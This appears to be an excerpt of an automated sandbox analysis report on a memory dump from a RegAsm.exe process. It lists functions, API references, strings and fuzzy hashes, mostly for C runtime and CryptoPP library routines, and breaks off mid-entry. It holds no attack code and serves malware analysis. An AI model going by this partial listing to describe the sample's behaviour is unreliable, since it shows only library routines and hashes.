Opcode Fuzzy Hash: 433f7082c7aca7455fd27364a80e2a65d60f7d668e02ed5d8cf12382729cb35b
Instruction Fuzzy Hash: 06F0553630024997CB149F39E829A6B7F90FFC1710F064059EE068B6A0C672D882CB50

Function 0042CEA0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9198fcdca9e424432a3a8203766c5c8cfaab3a57559baf0a43973d3f4d59e08d
Instruction ID: c16b9477e39db41abb06177a582d1fb9cc34123ff8719f24c64ea6a20d769a31
Opcode Fuzzy Hash: 9198fcdca9e424432a3a8203766c5c8cfaab3a57559baf0a43973d3f4d59e08d
Instruction Fuzzy Hash: 15E0C934901208EBCB14DFA4E84979DBBB5FB1C355F4052A6EC04A3360D7349988EB81

Function 00544C22 Relevance: 70.4, APIs: 11, Strings: 29, Instructions: 359COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00544C95
shared_ptr.LIBCMT ref: 00544CDD
shared_ptr.LIBCMT ref: 00544CFC
operator+.LIBVCRUNTIME ref: 00544E2A
DName::operator=.LIBVCRUNTIME ref: 00544E3C
shared_ptr.LIBCMT ref: 00545081
DName::operator+.LIBCMT ref: 005450C3
operator+.LIBVCRUNTIME ref: 00545109

Strings

char, xrefs: 00544C80
wchar_t, xrefs: 00544FD3
void, xrefs: 00544D25
bool, xrefs: 00544E8E
UNKNOWN, xrefs: 0054506C
double, xrefs: 00544D04
<unknown>, xrefs: 00544F9C
__int128, xrefs: 00544E63
unsigned , xrefs: 005450A2
int, xrefs: 00544CAF
long , xrefs: 00544CEA
this , xrefs: 00545009
volatile, xrefs: 00544F4B
char32_t, xrefs: 00544FC7
const, xrefs: 00544F2D
volatile, xrefs: 00544F6B
signed , xrefs: 00544D8A
__int64, xrefs: 00544E76
__int8, xrefs: 00544DF7
float, xrefs: 00544CC8
__int32, xrefs: 00544E82
short, xrefs: 00544C9F
decltype(auto), xrefs: 00544FEB
auto, xrefs: 00544FDF
char8_t, xrefs: 00544FAF
__w64 , xrefs: 00544E18
char16_t, xrefs: 00544FBB
long, xrefs: 00544CBF
__int16, xrefs: 00544DEB

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
API String ID: 1464150960-1482988683
Opcode ID: 97d89e91f73edd29426c38dfb520c3a0690f1fee51e02e2ca597e152d1bbdcd5
Instruction ID: a74152ec3fe6cbcdd6e66ed103a54149bf6b53857fb999c1198e7a9fbac2c6eb
Opcode Fuzzy Hash: 97d89e91f73edd29426c38dfb520c3a0690f1fee51e02e2ca597e152d1bbdcd5
Instruction Fuzzy Hash: 2AE17BB5D0420ADBCB04DFA4C49DAFEBFB8BB08308F10855AD515A7252E7755B09CFA1

Function 00548502 Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 297COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 005485D8
UnDecorator::getSignedDimension.LIBCMT ref: 005485E3
UnDecorator::getSignedDimension.LIBCMT ref: 005486CF
UnDecorator::getSignedDimension.LIBCMT ref: 005486EC
UnDecorator::getSignedDimension.LIBCMT ref: 00548709
DName::operator+.LIBCMT ref: 0054871E
UnDecorator::getSignedDimension.LIBCMT ref: 00548738
_swprintf.LIBCMTD ref: 005487B2
DName::operator+.LIBCMT ref: 0054880D

Part of subcall function 00544647: DName::DName.LIBVCRUNTIME ref: 005446A5

DName::DName.LIBVCRUNTIME ref: 00548884

Strings

nullptr, xrefs: 0054884D
uS, xrefs: 0054877F
`generic-method-parameter-, xrefs: 005487E9
lambda, xrefs: 0054886D
`template-type-parameter-, xrefs: 00548829
NULL, xrefs: 00548596
`generic-class-parameter-, xrefs: 00548819

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$_swprintf
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr$uS
API String ID: 138750261-172234052
Opcode ID: c09677eac4ef41ca6d02165598f8bd20fa768965569d5f17ee708976b6763b84
Instruction ID: 021091b49bba7b252cf704cfd7151fae3891600384b2777c9651b7b3d27b4641
Opcode Fuzzy Hash: c09677eac4ef41ca6d02165598f8bd20fa768965569d5f17ee708976b6763b84
Instruction Fuzzy Hash: 0391D771C0410BAACB19EBB4DC9EAFE7F78FB5530CF64491AF102A6191DF759A088760

Function 0054647A Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 332COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00546543
DName::operator+.LIBCMT ref: 00546580
DName::DName.LIBVCRUNTIME ref: 00546594
DName::operator+.LIBCMT ref: 005465A3
DName::operator+.LIBCMT ref: 00546631
DName::DName.LIBVCRUNTIME ref: 00546659
DName::operator+.LIBCMT ref: 00546667
DName::operator+.LIBCMT ref: 005466A1
DName::operator+.LIBCMT ref: 005466E2
UnDecorator::getReturnType.LIBCMT ref: 00546712
operator+.LIBVCRUNTIME ref: 00546814

Strings

QuT, xrefs: 0054664A, 00546758

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
String ID: QuT
API String ID: 2932655852-2893120971
Opcode ID: aa5c678fd647dcf6112b951906b66b392665429131e56a6cc116a9c5b71ca7c4
Instruction ID: 40c04e3d1db91fb46bc78a55f4f1d36e9028165b5c24f5072f060e2fdb628973
Opcode Fuzzy Hash: aa5c678fd647dcf6112b951906b66b392665429131e56a6cc116a9c5b71ca7c4
Instruction Fuzzy Hash: 89C1747190020AAFCF18EFA4D89AEEE7FB4FB59308F14055EF502A7291DB309A45CB51

Function 00540110 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,0041F869,0041F86B,00000000,00000000,6780E6CE,?,?,?,Function_00140780,00588468,000000FE,?,0041F869,00000001), ref: 00540199
MultiByteToWideChar.KERNEL32(00000000,00000000,0041F869,?,00000000,00000000,?,Function_00140780,00588468,000000FE,?,0041F869), ref: 00540214
SysAllocString.OLEAUT32(00000000), ref: 0054021F
_com_issue_error.COMSUPP ref: 00540248
_com_issue_error.COMSUPP ref: 00540252
GetLastError.KERNEL32(80070057,6780E6CE,?,?,?,Function_00140780,00588468,000000FE,?,0041F869,00000001), ref: 00540257
_com_issue_error.COMSUPP ref: 0054026A
GetLastError.KERNEL32(00000000,?,?,?,Function_00140780,00588468,000000FE,?,0041F869,00000001), ref: 00540280
_com_issue_error.COMSUPP ref: 00540293

Strings

uS, xrefs: 005402CF

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID: uS
API String ID: 1353541977-336044122
Opcode ID: 71b1ed4183e2e368b4fa1349d6540803a7ace21301d1342b97019e13a4dc057d
Instruction ID: 921b6c734bfe912ccb6cad27f360aa9d70cc9ae2e3493677c95e6d37f0840b02
Opcode Fuzzy Hash: 71b1ed4183e2e368b4fa1349d6540803a7ace21301d1342b97019e13a4dc057d
Instruction Fuzzy Hash: EB41D875A04205ABDB109F68DC4DBEEBFA8FB44718F305229FA19E72C0D7B49900D7A4

Function 0054603A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 005460AB
DName::operator+.LIBCMT ref: 005460F3
DName::DName.LIBVCRUNTIME ref: 00546123

Strings

char , xrefs: 0054606D
short , xrefs: 00546076
unsigned , xrefs: 005460D2
long , xrefs: 00546096
int , xrefs: 00546086

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::Name::operator+shared_ptr
String ID: char $int $long $short $unsigned
API String ID: 3919194733-3894466517
Opcode ID: ac22c2de9ff5b82de2cc33959c3fe7a74ce7f47ea181e23485cd5f9b71f5ed71
Instruction ID: 91b9bb37adf611b9ff29385a9645b0e372e3e5711bf790d3efc25e6331a62cc1
Opcode Fuzzy Hash: ac22c2de9ff5b82de2cc33959c3fe7a74ce7f47ea181e23485cd5f9b71f5ed71
Instruction Fuzzy Hash: 41212AB4800249EFCF04CFA4C899BEDBFB4FB16308F10858AE515A7292D7B49648CF42

Function 00540780 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 005407B7
___except_validate_context_record.LIBVCRUNTIME ref: 005407BF
_ValidateLocalCookies.LIBCMT ref: 00540848
__IsNonwritableInCurrentImage.LIBCMT ref: 00540873
_ValidateLocalCookies.LIBCMT ref: 005408C8

Strings

csm, xrefs: 0054085D
uS, xrefs: 0054088C

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$uS
API String ID: 1170836740-2183362451
Opcode ID: 02026319203c51cbade51a1027ce1deb871be51cd94b8956a2b35aad12176f88
Instruction ID: f3981e0b31e01d29bf23605c3d6dca02bc642a8a9e891d00e0336b9d76198f78
Opcode Fuzzy Hash: 02026319203c51cbade51a1027ce1deb871be51cd94b8956a2b35aad12176f88
Instruction Fuzzy Hash: 8B41B434A002099BCF10DF68C885ADEBFB5FF45318F249059EA18AB392D735EA05CBD1

Function 005447BC Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005446AF: Replicator::operator[].LIBCMT ref: 0054471B

DName::DName.LIBVCRUNTIME ref: 00544808
DName::operator+.LIBCMT ref: 0054484E

Strings

<ellipsis>, xrefs: 0054488F
..., xrefs: 0054487F
void, xrefs: 005448A0
,<ellipsis>, xrefs: 00544839
,..., xrefs: 00544829

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::Name::operator+Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 583996491-2211150622
Opcode ID: 3492c8023656a5f6f15862f652738a3cf5ed6a630e02b039b4c5ba4f6ac07d46
Instruction ID: 0fac9a67e45c6a0c0524414c15fb2ed08adb66b02e5bc4a613800fd37628cf0c
Opcode Fuzzy Hash: 3492c8023656a5f6f15862f652738a3cf5ed6a630e02b039b4c5ba4f6ac07d46
Instruction Fuzzy Hash: DE317CB0940289EFDB04CF98D8597EEBFF0FB05308F00854AEA95AB261C7749609DF81

Function 00508650 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 338COMMON

Download Yara Rule

Strings

7, xrefs: 005089F7
>, xrefs: 005088A0
!kcc, xrefs: 0050896C

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !kcc$7$>
API String ID: 0-3074482854
Opcode ID: fb0dfb79801743c21186c78e2cad15b086682c7c1a82ef3855c7c0dfd99f72eb
Instruction ID: e6b56d590888437b401fbd4ae6fa5c163daf3b81139779553f98c1f5918ce4c2
Opcode Fuzzy Hash: fb0dfb79801743c21186c78e2cad15b086682c7c1a82ef3855c7c0dfd99f72eb
Instruction Fuzzy Hash: 50F14874D04258DFDB14CFA8C890BEEBBB1BF49304F2485A9D845AB381DB359A45CF51

Function 00418CD0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCPMTD ref: 00418D95
_memcpy_s.LIBCPMTD ref: 00418DCE
_memcpy_s.LIBCPMTD ref: 00418E79
_memcpy_s.LIBCPMTD ref: 00418EB2

Strings

Salt, xrefs: 00418D10
Info, xrefs: 00418DF1

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: _memcpy_s
String ID: Info$Salt
API String ID: 2001391462-2052181562
Opcode ID: 6690312f40285432a8ddfbac61699edc478fc00efab240cd0606b20d90a62bb8
Instruction ID: a950d269242dfe9dd52c7fcc47e69861c35a5128e8b58a5cbb34649cfbeae689
Opcode Fuzzy Hash: 6690312f40285432a8ddfbac61699edc478fc00efab240cd0606b20d90a62bb8
Instruction Fuzzy Hash: 8391C8B5E002089FCB18DF95D891AEEBBB5BF58700F20815EE519B7391DB34A941CF54

Function 005449D6 Relevance: 10.7, APIs: 7, Instructions: 151COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00544A64
DName::operator+.LIBCMT ref: 00544AB7

Part of subcall function 0054368A: shared_ptr.LIBCMT ref: 005436A6

Part of subcall function 005435B5: DName::operator+.LIBCMT ref: 005435D6

DName::operator+.LIBCMT ref: 00544AA8
DName::operator+.LIBCMT ref: 00544B08
DName::operator+.LIBCMT ref: 00544B15
DName::operator+.LIBCMT ref: 00544B5C
DName::operator+.LIBCMT ref: 00544B69

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: b9a7eb6a02f97c272ef14c53133defa3641d00bb7b7a4d13cf81fd690010cd6a
Instruction ID: 5d99feb53ccfbfc570d0b77c02ed575b7953432501de9806d7671a74e92f01aa
Opcode Fuzzy Hash: b9a7eb6a02f97c272ef14c53133defa3641d00bb7b7a4d13cf81fd690010cd6a
Instruction Fuzzy Hash: A151A171D4020AABDF18DB94C849EEEBFB9FF48304F044459F501A7290EB709A48CFA4

Function 00566E3A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00566E8B
TypeidsEqual.LIBVCRUNTIME ref: 00566EB0
PMDtoOffset.LIBCMT ref: 00566EC6
PMDtoOffset.LIBCMT ref: 00566F47

Strings

75R, xrefs: 00566F8F
.?AVAuthenticatedSymmetricCipher@CryptoPP@@, xrefs: 00566F43

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: EqualOffsetTypeids
String ID: .?AVAuthenticatedSymmetricCipher@CryptoPP@@$75R
API String ID: 1707706676-2152600069
Opcode ID: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
Instruction ID: e03f0cb30912456cf73cee95ecc88c3d0b0647114a243d0fcba1ecfcef0bb93b
Opcode Fuzzy Hash: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
Instruction Fuzzy Hash: F341873990420A9FCF10CFA8E490AAEFFF5FF55310F14498AE851A7255D732AE44CB90

Function 005488CA Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getSignedDimension.LIBCMT ref: 0054891B

Strings

uS, xrefs: 00548962
void, xrefs: 005488EB
`template-parameter, xrefs: 00548985

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Decorator::getDimensionSigned
String ID: `template-parameter$uS$void
API String ID: 2996861206-2986298104
Opcode ID: dcbca23786ab9ebcca738f5e974f20defe8fbaa0ca7609052ed66dac36af4494
Instruction ID: 530430bb251fd7e7ca1b2ce5dc86491989f0a149b071517e6f4366dd81a2b71e
Opcode Fuzzy Hash: dcbca23786ab9ebcca738f5e974f20defe8fbaa0ca7609052ed66dac36af4494
Instruction Fuzzy Hash: 5A31527190420EABDF04DBE4D85ABFEBBF8BB5C308F10441AE601B3191DB749A0C9B65

Function 0055A8F2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,0041C3C8,?,6780E6CE,?,0055AA01,0041C3C8,0053E038,00000000,0041C3C8), ref: 0055A9B3

Strings

ext-ms-, xrefs: 0055A95D
api-ms-, xrefs: 0055A949

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 0fdcc605303da6b2f7034f1edd11ac72101ec615f719029160a6f8f46c5f4c57
Instruction ID: da48f7548a0f73b2077f71ef9ff21d7726c303b33cafd8cbef9bf5e1d652bec0
Opcode Fuzzy Hash: 0fdcc605303da6b2f7034f1edd11ac72101ec615f719029160a6f8f46c5f4c57
Instruction Fuzzy Hash: AB210831A00225FBC7228B64DC64A5A3B78FB527A1F220326EC05A7290D770ED08D6E2

Function 00418600 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00418612
int.LIBCPMTD ref: 00418624

Part of subcall function 0040E500: std::_Lockit::_Lockit.LIBCPMT ref: 0040E516
Part of subcall function 0040E500: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E540

Concurrency::cancel_current_task.LIBCPMTD ref: 0041866B
std::_Lockit::~_Lockit.LIBCPMT ref: 004186E1

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: fcf074ac198ef22dd4cb04887d15906ab0338ad049432f7b9d5a1a182cf364b9
Instruction ID: 0199eea585d919c532870c525719b061cd6942339d21c6b0a82242c96965bb99
Opcode Fuzzy Hash: fcf074ac198ef22dd4cb04887d15906ab0338ad049432f7b9d5a1a182cf364b9
Instruction Fuzzy Hash: 4431B3B5D00209EFCB04DF95D585AEEBBB5BF48300F108A6AE815B7390DB34AA45CF95

Function 0054E416 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0054E4B3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0054E5BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0054E5CD

Strings

=T, xrefs: 0054E421

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: =T
API String ID: 885266447-3806340721
Opcode ID: d822b3af1fe3d9f3b6ced3cd5c1978937d14edb7e4b25b420f3795e4590ff45a
Instruction ID: 802f42fe8954b042431766edbb863acf8f59caeff2da4b8ffacaa20abaed0416
Opcode Fuzzy Hash: d822b3af1fe3d9f3b6ced3cd5c1978937d14edb7e4b25b420f3795e4590ff45a
Instruction Fuzzy Hash: AD513E75A00209AFCF14DF98C886AEEBFB6FB89318F148559E855A7351E230DE41DB60

Function 005446AF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBCMT ref: 0054471B
DName::operator=.LIBVCRUNTIME ref: 005447B0

Strings

GT, xrefs: 005446B7
GT, xrefs: 0054472E

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: GT$GT
API String ID: 3211817929-2152628013
Opcode ID: 7b7dd62dbc9dfedf20a5674f537840bd6a9ddecca403dfe298fcd1bb64d7a993
Instruction ID: a56c8e332ea45dc530618a1a94d2c359f5915028fee701a0cac8cc098a6f2e50
Opcode Fuzzy Hash: 7b7dd62dbc9dfedf20a5674f537840bd6a9ddecca403dfe298fcd1bb64d7a993
Instruction Fuzzy Hash: E63121716402459BD714DBA4C88ABFE7FF9FB4371DF14081DE581972A2DBB0990ACB50

Function 00540B81 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(E06D7363,00000001,00000003,BS,?,?,?,?,0053E642,?,00588EB8), ref: 00540BE1

Strings

uS, xrefs: 00540BB1
BS, xrefs: 00540BCE, 00540BD1
BS, xrefs: 00540B8C

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionRaise
String ID: BS$BS$uS
API String ID: 3997070919-2206541984
Opcode ID: e1124269f4bf9cebe6574ce1e2b1bd7a7d60b0c34b683b0bc2485acf126c4bcb
Instruction ID: 8743a6e4ccbb16be51a9759d8c086da25a12cc0b164b9960dc5b549162f352b5
Opcode Fuzzy Hash: e1124269f4bf9cebe6574ce1e2b1bd7a7d60b0c34b683b0bc2485acf126c4bcb
Instruction Fuzzy Hash: B8018F76900208ABD7019F6CD884BAEBFB8FF44718F254159EE55AB390D7B0AD00CBD0

Function 0054614E Relevance: 6.2, APIs: 4, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00546283

Part of subcall function 005433C6: __aulldvrm.LIBCMT ref: 005433F7

DName::operator+.LIBCMT ref: 005461E4
DName::operator=.LIBVCRUNTIME ref: 005462C8
DName::DName.LIBVCRUNTIME ref: 005462FA

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=__aulldvrm
String ID:
API String ID: 2973644308-0
Opcode ID: eb3fe6bcec78a16d1778c550908613eed267dd70cf757a5a7a6ea6ebe477dac2
Instruction ID: d86121d32e947466586a06139f643f4ccfc9e72382077ba6a5573020e88006f8
Opcode Fuzzy Hash: eb3fe6bcec78a16d1778c550908613eed267dd70cf757a5a7a6ea6ebe477dac2
Instruction Fuzzy Hash: 36619EB4904256EFCB04CF98D885BEDBFB4FB56308F14845AE9416B361C7B09A40DF91

Function 00564ECA Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,005614E8,00000000,00000001,0000000C,00000000,?,00558003,00000000,00000000,00000000), ref: 00564EE1
GetLastError.KERNEL32(?,005614E8,00000000,00000001,0000000C,00000000,?,00558003,00000000,00000000,00000000,00000000,00000000,?,005585DD,?), ref: 00564EED

Part of subcall function 00564EB3: CloseHandle.KERNEL32(FFFFFFFE,00564EFD,?,005614E8,00000000,00000001,0000000C,00000000,?,00558003,00000000,00000000,00000000,00000000,00000000), ref: 00564EC3

___initconout.LIBCMT ref: 00564EFD

Part of subcall function 00564E75: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00564EA4,005614D5,00000000,?,00558003,00000000,00000000,00000000,00000000), ref: 00564E88

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,005614E8,00000000,00000001,0000000C,00000000,?,00558003,00000000,00000000,00000000,00000000), ref: 00564F12

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 78a1af474d07b0761b00585404e8e391e417f1564a84e024ca867a01b0b9ae7e
Instruction ID: 93e8362ec68e7f539381af621a390f8b073cdb562b1e8d5ead4fe94aa1b2800d
Opcode Fuzzy Hash: 78a1af474d07b0761b00585404e8e391e417f1564a84e024ca867a01b0b9ae7e
Instruction Fuzzy Hash: B8F01C36500129BBDF222FA5EC0C98A7F66FB583B1B004120FA2897120D7328864EF91

Function 0055465A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 005547D1

Strings

+, xrefs: 0055472F
-, xrefs: 00554722

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: 0eb73403c6ad4f2bb151b54228d5cb837cf2bad058a209e406f441fac7a18394
Instruction ID: 4f247e70a663acb8c3d52ea08d6a81d749537a2582cef42202ba693493f8c53a
Opcode Fuzzy Hash: 0eb73403c6ad4f2bb151b54228d5cb837cf2bad058a209e406f441fac7a18394
Instruction Fuzzy Hash: 7CA1C330910259AFDF14CE69C8606FE7FB1FF5A32AF14855BEC659B281D330998A8F50

Function 00420E20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 00420FF9

Strings

n{, xrefs: 00420FB1
}{, xrefs: 00420F61

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: n{$}{
API String ID: 3732870572-1042045087
Opcode ID: bb7ac5a190c8fe079a9ac3989b4573cd2aec50649a18d77b221becce7819b8f2
Instruction ID: eaf1b40876ff27981f157cc11598657eb5f85387195161b8bd6187d6507d60f7
Opcode Fuzzy Hash: bb7ac5a190c8fe079a9ac3989b4573cd2aec50649a18d77b221becce7819b8f2
Instruction Fuzzy Hash: 7D910FB1E012189FDB54CBA8DC81BAEB7F6FB88315F248129F908F7350D678AD458B54

Function 005481D7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBCMT ref: 00548232
DName::DName.LIBVCRUNTIME ref: 0054837D

Strings

..., xrefs: 00548334

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: NameName::Replicator::operator[]
String ID: ...
API String ID: 3707554701-440645147
Opcode ID: d566767256c45ac9024f25040ca0f9eb3eb5680452e3da8451354c959b671c0f
Instruction ID: 7c1d151daa1fdf41879bfbd09309a77717fd8c1bd198b0cf7ac1fb5391288f9b
